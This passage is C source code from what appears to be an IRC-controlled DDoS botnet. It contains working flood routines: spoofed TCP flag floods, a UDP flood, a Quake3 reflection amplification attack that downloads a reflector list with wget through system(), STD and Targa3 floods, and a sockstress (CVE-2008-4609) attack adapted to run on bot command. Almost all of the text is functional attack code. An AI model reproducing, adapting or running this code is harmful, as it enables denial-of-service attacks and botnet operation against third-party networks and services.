send_tcp.tcp.ack = 0;
send_tcp.tcp.psh = 0;
send_tcp.tcp.syn = 0;
send_tcp.tcp.fin = 0;
send_tcp.tcp.rst = 0;
send_tcp.tcp.urg_ptr = 0;
if(!strcmp(argv[2], "all")) {
send_tcp.tcp.syn = 1;
send_tcp.tcp.rst = 1;
send_tcp.tcp.fin = 1;
send_tcp.tcp.ack = 1;
send_tcp.tcp.psh = 1;
send_tcp.tcp.urg = 1;
} else if(!strcmp(argv[2], "xmas")) {
send_tcp.tcp.fin = 1;
send_tcp.tcp.psh = 1;
send_tcp.tcp.urg = 1;
} else if(!strcmp(argv[2], "usyn")) {
send_tcp.tcp.syn = 1;
send_tcp.tcp.urg = 1;
} else {
unsigned char *pch = strtok(argv[2], ",");
while(pch) {
if(!strcmp(pch, "syn")) { send_tcp.tcp.syn = 1;
} else if(!strcmp(pch, "rst")) { send_tcp.tcp.rst = 1;
} else if(!strcmp(pch, "fin")) { send_tcp.tcp.fin = 1;
} else if(!strcmp(pch, "ack")) { send_tcp.tcp.ack = 1;
} else if(!strcmp(pch, "psh")) { send_tcp.tcp.psh = 1;
} else if(!strcmp(pch, "urg")) { send_tcp.tcp.urg = 1;
} else {
}
pch = strtok(NULL, ",");
}
}
send_tcp.tcp.window = rand_cmwc();
send_tcp.ip.daddr = daddr;
sin.sin_addr.s_addr = send_tcp.ip.daddr;
send_tcp.ip.check = 0;
send_tcp.tcp.check = 0;
pseudo_header.dest_address = send_tcp.ip.daddr;
pseudo_header.placeholder = 0;
while(1) {
dest = portz[realrand(0, howmanyportz)];
saddr=getspoof();
send_tcp.ip.tot_len = htons(40+psize);
send_tcp.ip.id = rand();
send_tcp.tcp.window = rand_cmwc();
send_tcp.ip.saddr = saddr;
send_tcp.tcp.source = rand();
send_tcp.tcp.dest = portz[realrand(0, howmanyportz)];
send_tcp.tcp.seq = rand();
sin.sin_port = dest;
send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
check = rand();
send_tcp.buf[9]=((char*)&check)[0];
send_tcp.buf[10]=((char*)&check)[1];
send_tcp.buf[11]=((char*)&check)[2];
send_tcp.buf[12]=((char*)&check)[3];
pseudo_header.source_address = send_tcp.ip.saddr;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20+psize);
bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
if (a >= 100) {
if (time(NULL) >= start+secs) exit(0);
a=0;
}
a++;
}
close(get);
exit(0);
}
void makeRandomShit(unsigned char *buf, int length) {
srand(time(NULL));
int i = 0;
for(i = 0; i < length; i++) buf[i] = rand();
}
void unknown(int sock, char *sender, int argc, char **argv) {
/*
Non spoof UDP flooder modded by Bit-Dealer/Bit-Dealer
Now has port and packetsize options
and an option for random port and packetsize! (just enter 0)
Each packet is unique!
Cheers homies.
only shout iz here and it is to:
kod for all the help you gave me and showing me kaiten in the first place!
luv u bb <3
*/
int fd,i,packetsize,index;
// int flag = 1;
int randport = 0;
int randsize = 0;
unsigned long secs;
struct hostent *hp;
struct sockaddr_in in;
time_t start = time(NULL);
char *packsize;
if (argc < 4) {
Send(sock, "NOTICE %s :UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs>\n", sender);
exit(1);
}
if (mfork(sender) != 0) return;
unsigned char *packet = malloc(65507);
memset(packet, 0, 65507);
if(!strcmp(argv[2],"0")) {
randport = 1;
}
if(!strcmp(argv[3],"0")) {
randsize = 1;
packsize = "random";
} else {
packsize = argv[3];
}
srand(time(NULL));
secs=atol(argv[4]);
memset((void*)&in,0,sizeof(struct sockaddr_in));
in.sin_addr.s_addr=host2ip(sender,argv[1]);
in.sin_family = AF_INET;
if(randport == 0) {
in.sin_port = htons(atoi(argv[2]));
packsize = argv[3];
}
Send(sock, "NOTICE %s :Unknowning %s:%s with packet size %s\n", sender, argv[1], argv[2], packsize);
while(1) {
if(randport == 1) {
in.sin_port = htons(realrand(1026, 65535));
}
if(randsize == 1) {
makeRandomShit(packet, realrand(64, 65507));
} else {
makeRandomShit(packet, atoi(argv[3]));
}
if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
else {
// ioctl(fd, FIONBIO, &flag); whoever did this was fucking retarded lmao
sendto(fd, packet, strlen(packet) + 1, 0, (struct sockaddr*)&in, sizeof(in));
close(fd);
}
if (i >= 100) {
if (time(NULL) >= start+secs) {
break;
} else {
i=0;
}
}
i++;
}
close(fd);
exit(0);
}
struct alist
{
struct sockaddr_in data;
struct list *next;
struct list *prev;
};
struct quakethread_data{ int thread_id; struct alist *list_node; struct sockaddr_in sin; };
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_quake_udp_header(struct udphdr *udph)
{
udph->source = htons(5678);
udph->dest = htons(27960);
udph->check = 0;
memcpy((void *)udph + sizeof(struct udphdr), "\xff\xff\xff\xff\x67\x65\x74\x73\x74\x61\x74\x75\x73\x0a", 14);
udph->len=htons(sizeof(struct udphdr) + 14);
}
void *quakeflood(void *par1)
{
struct quakethread_data *td = (struct quakethread_data *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin = td->sin;
struct alist *list_node = td->list_node;
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
init_rand(time(NULL));
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_quake_udp_header(udph);
udph->source = htons((rand() % (65535 - 1026)) + 1026);
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
list_node = list_node->next;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
pps++;
if (i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
void quake3(int sock, char *sender, int argc, char *argv[])
{
if (mfork(sender) != 0) return;
int get;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
char *command[128];
if(argc < 6) {
Send(sock, "NOTICE %s :QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender);
exit(-1);
}
srand(time(NULL));
int i = 0;
head = NULL;
fprintf(stdout, "Setting up sockets...\n");
int max_len = 128;
char *buffer = (char *) malloc(max_len);
buffer = memset(buffer, 0x00, max_len);
int num_threads = atoi(argv[4]);
int maxpps = atoi(argv[5]);
limiter = 0;
pps = 0;
int multiplier = 20;
sprintf(command, "wget \"%s\" -O QUAKE3.txt || busybox wget \"%s\" -O QUAKE3.txt || /bin/busybox wget \"%s\" -O QUAKE3.txt || /usr/busybox wget \"%s\" -O QUAKE3.txt", argv[3], argv[3], argv[3], argv[3]);
system(command);
FILE *list_fd = fopen("QUAKE3.txt", "r");
while (fgets(buffer, max_len, list_fd) != NULL) {
if ((buffer[strlen(buffer) - 1] == '\n') ||
(buffer[strlen(buffer) - 1] == '\r')) {
buffer[strlen(buffer) - 1] = 0x00;
if(head == NULL) {
head = (struct alist *)malloc(sizeof(struct alist));
bzero(&head->data, sizeof(head->data));
head->data.sin_addr.s_addr=inet_addr(buffer);
head->next = head;
head->prev = head;
} else {
struct alist *new_node = (struct alist *)malloc(sizeof(struct alist));
memset(new_node, 0x00, sizeof(struct alist));
new_node->data.sin_addr.s_addr=inet_addr(buffer);
new_node->prev = head;
new_node->next = head->next;
head->next = new_node;
}
i++;
} else {
continue;
}
}
struct alist *current = head->next;
pthread_t thread[num_threads];
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
struct quakethread_data td[num_threads];
for(i = 0;i<num_threads;i++){
td[i].thread_id = i;
td[i].sin= sin;
td[i].list_node = current;
pthread_create( &thread[i], NULL, &quakeflood, (void *) &td[i]);
}
Send(sock, "NOTICE %s :Quake3 amp attacking %s:%s\n", sender,argv[1],argv[2]);
fprintf(stdout, "Starting flood muthafucka...\n");
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
}
int listFork() {
uint32_t parent, *newpids, i;
parent = fork();
if (parent <= 0) return parent;
numpids++;
newpids = (uint32_t*)malloc((numpids + 1) * 4);
for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
newpids[numpids - 1] = parent;
free(pids);
pids = newpids;
return parent;
}
void SendTheSTD(unsigned char *ip, int port, int secs) {
int iSTD_Sock;
iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
time_t start = time(NULL);
struct sockaddr_in sin;
struct hostent *hp;
hp = gethostbyname(ip);
bzero((char*) &sin,sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = port;
int i = 0;
while(1){
send(iSTD_Sock, "std", 69, 0);
connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
if (i >= 100) {
if (time(NULL) >= start+secs) {
break;
} else {
i=0;
}
}
i++;
}
}
void sendSTD(int sock, char *sender, int argc, char **argv) {
//!* STD TARGET PORT TIME
if (mfork(sender) != 0) return;
if(argc < 3) {
Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender);
exit(1);
}
unsigned char *ip = argv[1];
int port = atoi(argv[2]);
int time = atoi(argv[3]);
if(strstr(ip, ",") != NULL) {
unsigned char *hi = strtok(ip, ",");
while(hi != NULL) {
if(!listFork()) {
Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,argv[1],argv[2]);
SendTheSTD(hi, port, time);
_exit(0);
}
hi = strtok(NULL, ",");
}
} else {
if (listFork()) {
exit(1);
}
Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,argv[1],argv[2]);
SendTheSTD(ip, port, time);
_exit(0);
}
}
struct sa_in {
unsigned short int sin_family, sin_port;
struct {
unsigned int s_addr;
}
sin_addr;
unsigned char sin_zero[8];
};
struct iph { /* IP header */
#if __BYTE_ORDER == __LITTLE_ENDIAN
#define TONS(n) htons(n)
unsigned char ihl:4;
unsigned char version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
#define TONS(n) (n)
unsigned char version:4;
unsigned char ihl:4;
#endif
unsigned char tos;
unsigned short int tot_len;
unsigned short int id;
unsigned short int frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short int check;
unsigned int saddr;
unsigned int daddr;
};
void targa3(int sock, char *sender, int argc, char **argv) {
if (mfork(sender) != 0) return;
int get;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
if (argc < 2) {
Send(sock, "NOTICE %s :TARGA3 <ip1> [ip2] ... [-s seconds]\n", sender);
exit(-1);
}
if (argc > 201) {
Send(sock, "NOTICE %s :Cannot target more than 200 hosts! Wtf are u tryna do?!?\n", sender);
exit(-1);
}
int s = socket (AF_INET, SOCK_RAW, 255); /* IPPROTO_RAW */
int res, psize, loopy, targets = 0, tind;
long count = 1;
char *packet, ansi[16];
struct sa_in sin;
struct iph *ip;
u_long target[200];
int proto[14] = { /* known internet protcols */
0, 1, 2, 4, 6, 8, 12, 17, 22, 41, 58, 255, 0,
};
int frags[10] = { /* (un)common fragment values */
0, 0, 0, 8192, 0x4, 0x6, 16383, 1, 0,
};
int flags[7] = { /* (un)common message flags */
0, 0, 0, 0x4, 0, 0x1,
};
rnd = open ("/dev/urandom", O_RDONLY);
read (rnd, rseed, 4095);
rsi = 0;
snprintf (ansi, 15, "[%d;3%dm", realrand (0, 1), realrand (1, 7));
printf ("\t\t%starga 3.0 by Mixter modded by Bit-Dealer[0m\n", ansi);
fflush (stdout);
for (loopy = 1; loopy < argc; loopy++) {
if (strcmp (argv[loopy - 1], "-s") == 0) {
if (atoi (argv[loopy]) > 1)
count = atol(argv[loopy]);
continue;
}
if (inet_addr (argv[loopy]) != -1) {
target[targets] = inet_addr (argv[loopy]);
targets++;
}
}
if (!targets) {
Send(sock, "NOTICE %s :No valid IPs found!\n", sender);
exit(-1);
}
Send(sock, "NOTICE %s :Attacking %d hosts using targa3\n", sender, targets);
pid = getpid ();
psize = sizeof (struct iph) + realrand (128, 1024);
packet = calloc (1, psize);
ip = (struct iph *) packet;
setsockopt (s, 0, 3, "1", sizeof ("1")); /* IP_HDRINCL: header included */
sin.sin_family = PF_INET;
sin.sin_port = TONS (0);
time_t start = time(NULL);
int i = 0;
while (1) {
for (loopy = 0; loopy < 0xff; loopy++) {
for (tind = 0; tind < targets + 1; tind++) {
sin.sin_addr.s_addr = target[tind];
if (rsi > 4000) {
read (rnd, rseed, 4095);
rsi = 0;
}
read (rnd, packet, psize);
proto[13] = realrand (0, 255);
frags[9] = realrand (0, 8100);
flags[6] = realrand (0, 0xf);
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->tot_len = TONS (psize);
ip->id = TONS (realrand (1, 10000));
ip->ttl = 0x7f;
ip->protocol = proto[(int) realrand (0, 13)];
ip->frag_off = TONS (frags[(int) realrand (0, 9)]);
ip->check = 0;
ip->saddr = random ();
ip->daddr = target[tind];
sendto (s,
packet,
psize,
flags[(int) realrand (0, 6)],
(struct sockaddr *) &sin,
sizeof (struct sockaddr));
if (i >= 100) {
if (time(NULL) >= start + count) {
free(packet); /* free willy */
exit(0);
} else {
i=0;
}
}
i++;
}
}
}
free(packet); /* free willy */
exit(0);
return;
}
/*
* _____ ____ _____ _ __ _____ _______ _____ ______ _____ _____
* / ____|/ __ \ / ____| |/ // ____|__ __| __ \| ____|/ ____|/ ____|
* | (___ | | | | | | ' /| (___ | | | |__) | |__ | (___ | (___
* \___ \| | | | | | < \___ \ | | | _ /| __| \___ \ \___ \
* ____) | |__| | |____| . \ ____) | | | | | \ \| |____ ____) |____) |
* |_____/ \____/ \_____|_|\_\_____/ |_| |_| \_\______|_____/|_____/
*
* CVE-2008-4609
* https://defuse.ca/sockstress.htm
*
* By: havoc@defuse.ca
* Date: April 9, 2012
*
* This code is explicitly placed into the public domain.
*
* THIS CODE IS PROVIDED FOR EDUCATIONAL AND ETHICAL SECURITY TESTING PURPOSES
* ONLY. THE AUTHOR IS NOT RESPONSIBLE FOR ILLEGAL USE OF, OR DAMAGE CAUSED
* BY, THIS CODE. There is NO WARRANTY, to the extent permitted by law.
*
* Compile: gcc -Wall -c sockstress.c
* gcc -pthread -o sockstress sockstress.o
*
* Usage: ./sockstress <ip>:<port> <interface> [-p payload] [-d delay]
* <ip> Victim IP address
* <port> Victim port
* <interface> Local network interface (e.g. eth0)
* -p payload File containing data to send after connecting
* Payload can be at most 1000 bytes
* -d delay Microseconds between SYN packets (default: 10000
* -h Help menu
*/
struct ip_header {
unsigned char ver_ihl;
unsigned char type_of_service;
uint16_t length;
uint32_t line2; // don't care about these bits
unsigned char ttl;
unsigned char protocol;
uint16_t checksum;
uint32_t source_addr;
uint32_t dest_addr;
uint32_t options;
};
struct tcp_header {
uint16_t src_port;
uint16_t dest_port;
uint32_t seq;
uint32_t ack;
uint16_t off_res_flags;
uint16_t window;
uint16_t checksum;
uint16_t urg_ptr;
uint32_t opts_pad;
};
#pragma pack(pop)
static const char *optString = "h?p:d:";
struct globalArgs_t {
uint16_t attack_port;
struct in_addr attack_ip;
struct sockaddr_in iface_addr;
int syn_delay;
unsigned char payload[MAX_PAYLOAD_SIZE];
size_t payload_size;
time_t start;
long secs;
int sock;
char *sender;
} globalArgs;
struct packetStats_t {
unsigned long syn_sent;
unsigned long ack_sent;
unsigned long synack_recv;
unsigned long ack_recv;
unsigned long rst_recv;
} packetStats;
void *process_incoming(void *ptr);
void *send_syns(void *ptr);
int get_iface_ip(struct sockaddr_in *ip, char *iface);
void calc_tcp_checksum(unsigned char *packet, unsigned long packet_length, struct in_addr src, struct in_addr dst);
void send_ack(unsigned char *packet);
void *print_status(void *ptr);
void printUsage(char *msg);
void initStats(void);
void processArgs(int argc, char **argv);
void loadPayload(char *path);
void printIntro(void);
void sockstress(int sock, char *sender, int argc, char **argv) {
if (mfork(sender) != 0) return;
int get;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
globalArgs.sock = sock;
globalArgs.sender = sender;
srand(time(NULL));
printIntro();
initStats();
processArgs(argc, argv);
// Start the packet processor
pthread_t packet_processor;
pthread_create(&packet_processor, NULL, process_incoming, NULL);
// Start the syn flood thread
pthread_t syn_sender;
pthread_create(&syn_sender, NULL, send_syns, NULL);
pthread_t status_update;
pthread_create(&status_update, NULL, print_status, NULL);
// Wait for the threads to return
pthread_join(syn_sender, NULL);
pthread_join(packet_processor, NULL);
pthread_join(status_update, NULL);
return 0;
}
void printIntro(void) {
puts("SOCKSTRESS - CVE-2008-4609 | havoc@defuse.ca");
}
void printUsage(char *msg) {
Send(globalArgs.sock, "NOTICE %s :%s. Usage: SOCKSTRESS <ip>:<port> <interface> -s <time> [-p payload] [-d delay]\n", globalArgs.sender, msg);
exit(-1);
}
void initStats(void) {
packetStats.syn_sent = 0;
packetStats.ack_sent = 0;
packetStats.synack_recv = 0;
packetStats.ack_recv = 0;
packetStats.rst_recv = 0;
}
void processArgs(int argc, char **argv) {
globalArgs.attack_port = 0;
globalArgs.syn_delay = DEFAULT_SYN_DELAY;
globalArgs.payload_size = 0;
globalArgs.start = time(NULL);
globalArgs.secs = 0;
int opt = 0;
while((opt = getopt(argc, argv, optString)) != -1) {
switch(opt) {
case 's':
if(globalArgs.secs <= 0) {
printUsage("Invalid attack time.");
exit(0);
}
globalArgs.secs = atol(optarg);
case 'p':
loadPayload(optarg);
break;
case 'd':
globalArgs.syn_delay = atoi(optarg);
if(globalArgs.syn_delay == 0)
printUsage("Invalid delay.");
break;
case 'h':
case '?':
printUsage(NULL);
default:
break;
}
}
char **remArgv = argv + optind;
int remArgc = argc - optind;
if(remArgc > 3)
printUsage("Too many arguments.");
if(remArgc < 3)
printUsage("Too few arguments.");
int ip_index = 0;
int iface_index = 1;
// If they put the interface before the ip:port, swap the indexes.
if(get_iface_ip(&globalArgs.iface_addr, remArgv[iface_index]) == 0) {
ip_index = 1;
iface_index = 0;
if(get_iface_ip(&globalArgs.iface_addr, remArgv[iface_index]) == 0)
printUsage("Invalid interface.");
}
char *ip = remArgv[ip_index];
char *port = remArgv[ip_index];
while(*port != ':' && *port != '\0')
port++;
if(*port == '\0')
printUsage("Please specify a port.");
*port = '\0';
port++;
globalArgs.attack_port = atoi(port);
if(globalArgs.attack_port == 0)
printUsage("Invalid port.");
if(inet_aton(ip, &globalArgs.attack_ip) == 0)
printUsage("Invalid IP address.");
printf("[+] Sending packets from %s (%s)\n", remArgv[iface_index], inet_ntoa(globalArgs.iface_addr.sin_addr));
printf("[+] Attacking: %s:%hu...\n", ip, globalArgs.attack_port);
}
void loadPayload(char *path)
{
FILE *file = fopen(path, "rb");
if(file == NULL)
printUsage("Error reading payload file.");
globalArgs.payload_size = fread(globalArgs.payload, sizeof(unsigned char), MAX_PAYLOAD_SIZE, file);
if(ferror(file))
printUsage("Error reading payload file.");
}
void *print_status(void *ptr)
{
if(DEBUG_MODE)
return NULL;
while(1) {
printf("[+] SENT: syn: %lu ack: %lu RECV: synack: %lu ack: %lu rst: %lu\r",
packetStats.syn_sent, packetStats.ack_sent, packetStats.synack_recv, packetStats.ack_recv, packetStats.rst_recv);
fflush(stdout);
sleep(1);
if (time(NULL) >= globalArgs.start+globalArgs.secs) {
Send(globalArgs.sock,"NOTICE %s :[+] SENT: syn: %lu ack: %lu RECV: synack: %lu ack: %lu rst: %lu\n", globalArgs.sender,
packetStats.syn_sent, packetStats.ack_sent, packetStats.synack_recv, packetStats.ack_recv, packetStats.rst_recv);
exit(0);
}
}
}
void *send_syns(void *ptr)
{
int s_out = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if(s_out < 0)
{
perror("[!] Error creating socket to send SYNs");
exit(-1);
}
if(bind(s_out, (struct sockaddr*)&globalArgs.iface_addr, sizeof(struct sockaddr_in)) == -1)
{
perror("[!] Error binding socket to send SYNs");
exit(-1);
}
struct tcp_header tcp;
struct sockaddr_in attack_addr;
attack_addr.sin_family = AF_INET;
attack_addr.sin_addr = globalArgs.attack_ip;
tcp.ack = 0;
tcp.off_res_flags = 0;
// set data offset
tcp.off_res_flags |= htons(0x6000);
// set syn flag
tcp.off_res_flags |= htons(0x0002);
tcp.dest_port = htons(globalArgs.attack_port);
tcp.urg_ptr = 0;
tcp.opts_pad = 0;
int i = 0;
while(1) {
tcp.src_port = (rand() & 0xFFFF) | 0x8000;
tcp.seq = htonl(rand());
tcp.window = rand(); // Was modified from 1000 to help evade detectiom
calc_tcp_checksum((unsigned char*)&tcp, sizeof(struct tcp_header), globalArgs.iface_addr.sin_addr, attack_addr.sin_addr);
int ret = sendto(s_out, &tcp, sizeof(struct tcp_header), 0,
(struct sockaddr*)&attack_addr, sizeof(struct sockaddr_in));
if(ret == -1)
perror("[!] Error sending SYN packet");
packetStats.syn_sent++;
usleep(globalArgs.syn_delay);
if (i >= 100) {
if (time(NULL) >= globalArgs.start+globalArgs.secs) {
return;
} else {
i=0;
}
}
i++;
}
}
void send_ack(unsigned char *packet)
{
if(DEBUG_MODE)
printf("[d] ---SENDING ACK...\n");
static int s_out = -1;
if(s_out == -1)
{
if(DEBUG_MODE)
printf("[d] Initializing ACK socket...\n");
s_out = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if(s_out < 0)
{
perror("[!] Error creating socket to send ACK/SYNACK");
exit(-1);
}
if(bind(s_out, (struct sockaddr*)&globalArgs.iface_addr, sizeof(struct sockaddr_in)) == -1)
{
perror("[!] Error binding socket to send ACK/SYNACK");
exit(-1);
}
}
struct sockaddr_in attack_addr;
attack_addr.sin_family = AF_INET;
attack_addr.sin_addr = globalArgs.attack_ip;
struct ip_header *ip = (struct ip_header*)packet;
struct tcp_header *synack = (struct tcp_header*)(packet + 4*(ip->ver_ihl & 0x0F));
unsigned char reply[sizeof(struct tcp_header) + MAX_PAYLOAD_SIZE];
struct tcp_header *ack = (struct tcp_header*)reply;
ack->src_port = synack->dest_port;
ack->dest_port = synack->src_port;
ack->ack = synack->seq; // Only add 1 if it's a synack (done below)
ack->seq = synack->ack;
ack->off_res_flags = 0;
// set data offset
ack->off_res_flags |= htons(0x6000);
// set ack flag
ack->off_res_flags |= htons(0x0010);
ack->window = 0; // zero window to make the other side wait
ack->urg_ptr = 0;
ack->opts_pad = 0;
// If the received packet is a SYNACK, attach the payload
unsigned long packet_size = sizeof(struct tcp_header);
if(synack->off_res_flags & htons(0x0010) && synack->off_res_flags & htons(0x0002))
{
ack->ack = htonl(ntohl(synack->seq) + 1);
ack->seq = synack->ack;
memcpy(reply + sizeof(struct tcp_header), globalArgs.payload, globalArgs.payload_size);
packet_size += globalArgs.payload_size;
}
calc_tcp_checksum(reply, packet_size, globalArgs.iface_addr.sin_addr, attack_addr.sin_addr);
int ret = sendto(s_out, reply, packet_size, 0,
(struct sockaddr*)&attack_addr, sizeof(struct sockaddr_in));
if(ret == -1)
perror("[!] Error sending ACK/SYNACK packet");
}
// Thread for processing incoming packets
void *process_incoming(void *ptr)
{
int s_listen = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if(s_listen < 0)
{
perror("[!] Error creating socket to process incoming packets");
exit(-1);
}
struct sockaddr_in localhost;
localhost.sin_family = AF_INET;
localhost.sin_addr.s_addr = INADDR_ANY;
bind(s_listen, (struct sockaddr*)&localhost, sizeof(localhost));
unsigned char packet_buffer[10000];
while(1)
{
int count = recv(s_listen, packet_buffer, 10000, 0);
struct ip_header *ip = (struct ip_header*)packet_buffer;
struct tcp_header *tcp = (struct tcp_header*)(packet_buffer + 4*(ip->ver_ihl & 0x0F));
if(ip->source_addr == globalArgs.attack_ip.s_addr && ip->protocol == IP_PROT_TCP)
{
if (time(NULL) >= globalArgs.start+globalArgs.secs) {
exit(0);
}
struct in_addr src_addr;
src_addr.s_addr = ip->source_addr;
int urg, ack, psh, rst, syn, fin;
urg = tcp->off_res_flags & htons(0x0020);
ack = tcp->off_res_flags & htons(0x0010);
psh = tcp->off_res_flags & htons(0x0008);
rst = tcp->off_res_flags & htons(0x0004);
syn = tcp->off_res_flags & htons(0x0002);
fin = tcp->off_res_flags & htons(0x0001);
if(DEBUG_MODE)
{
printf("[d] Got %d byte TCP packet from %s\n", count, inet_ntoa(src_addr));
printf("[d]\t SEQ: %lx ACK: %lx\n", (long)ntohl(tcp->seq), (long)ntohl(tcp->ack));
printf("[d]\t SRC: %d DST: %d\n", (int)ntohs(tcp->src_port), (int)ntohs(tcp->dest_port));
printf("[d]\t IP CHECKSUM %lx TCP CHECKSUM %lx\n", (long)ip->checksum, (long)tcp->checksum);
printf("[d]\t FLAGS: ");
if(urg)
printf("URG ");
if(ack)
printf("ACK ");
if(psh)
printf("PSH ");
if(rst)
printf("RST ");
if(syn)
printf("SYN ");
if(fin)
printf("FIN ");
printf("\n[d]\t WINDOW: %d", tcp->window);
printf("\n");
}
// Complete the connection
if(syn && ack)
{
packetStats.synack_recv++;
send_ack(packet_buffer);
packetStats.ack_sent++;
}
// Keep it alive
else if(ack)
{
packetStats.ack_recv++;
send_ack(packet_buffer);
packetStats.ack_sent++;
}
else if(rst)
{
packetStats.rst_recv++;
}
}
}
}
#define ADD_16BIT_OVERFLOW(x) x = (x + (1&(x >> 16))) & 0xFFFF;
void calc_tcp_checksum(unsigned char *packet, unsigned long packet_length, struct in_addr src, struct in_addr dst)
{
uint32_t checksum = 0;
// Pseudo Header
uint32_t source_ip = ntohl(src.s_addr);
uint32_t dest_ip = ntohl(dst.s_addr);
// Source Address
checksum += (source_ip >> 16) & 0xFFFF;
ADD_16BIT_OVERFLOW(checksum);
checksum += source_ip & 0x0000FFFF;
ADD_16BIT_OVERFLOW(checksum);
// Destination Address
checksum += (dest_ip >> 16) & 0xFFFF;
ADD_16BIT_OVERFLOW(checksum);
checksum += dest_ip & 0x0000FFFF;
ADD_16BIT_OVERFLOW(checksum);
// zero||protocol
checksum += 0x0006;
ADD_16BIT_OVERFLOW(checksum);
//TCP length
checksum += packet_length;
ADD_16BIT_OVERFLOW(checksum);
// Set the checksum field to 0
struct tcp_header *tcp = (struct tcp_header*)packet;
tcp->checksum = 0;
int i;
for(i = 0; i < packet_length / 2; i++)
{
// Read the 16-bit word in the correct endianness
uint16_t block = (packet[i * 2] << 8) | packet[i * 2 + 1];
checksum += block;
ADD_16BIT_OVERFLOW(checksum);
}
if(packet_length % 2 == 1)
{
uint16_t last_block = packet[packet_length-1] << 8;
checksum += last_block;
ADD_16BIT_OVERFLOW(checksum);
}
// actual checksum is the one's compliment of the one's compliment sum
tcp->checksum = htons(~checksum);
}
int get_iface_ip(struct sockaddr_in *ip, char *iface)
{
int fd;
struct ifreq ifr;
fd = socket(AF_INET, SOCK_DGRAM, 0);
ifr.ifr_addr.sa_family = AF_INET;
strncpy(ifr.ifr_name, iface, IFNAMSIZ - 1);
int ret = ioctl(fd, SIOCGIFADDR, &ifr);
if(ret != 0)
{
return 0;
}
close(fd);
ip->sin_family = AF_INET;
ip->sin_addr = ((struct sockaddr_in*)&ifr.ifr_addr)->sin_addr;
return 1;
}
int getHost(unsigned char *toGet, struct in_addr *i) {
struct hostent *h;
if((i->s_addr = inet_addr(toGet)) == -1) return 1;
return 0;
}
void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + packetSize;
iph->id = rand_cmwc();
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = protocol;
iph->check = 0;
iph->saddr = source;
iph->daddr = dest;
}
struct tcp_thread_data{
unsigned char *target;
int port;
int secs;
unsigned char *flags;
int packetsize;
int pollinterval;
int spoofit;
};
static void printchar(unsigned char **str, int c) {
if (str) {
**str = c;
++(*str);
}
else (void)write(1, &c, 1);
}
static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
register int pc = 0, padchar = ' ';
if (width > 0) {
register int len = 0;
register const unsigned char *ptr;
for (ptr = string; *ptr; ++ptr) ++len;
if (len >= width) width = 0;
else width -= len;
if (pad & PAD_ZERO) padchar = '0';
}
if (!(pad & PAD_RIGHT)) {
for ( ; width > 0; --width) {
printchar (out, padchar);
++pc;
}
}
for ( ; *string ; ++string) {
printchar (out, *string);
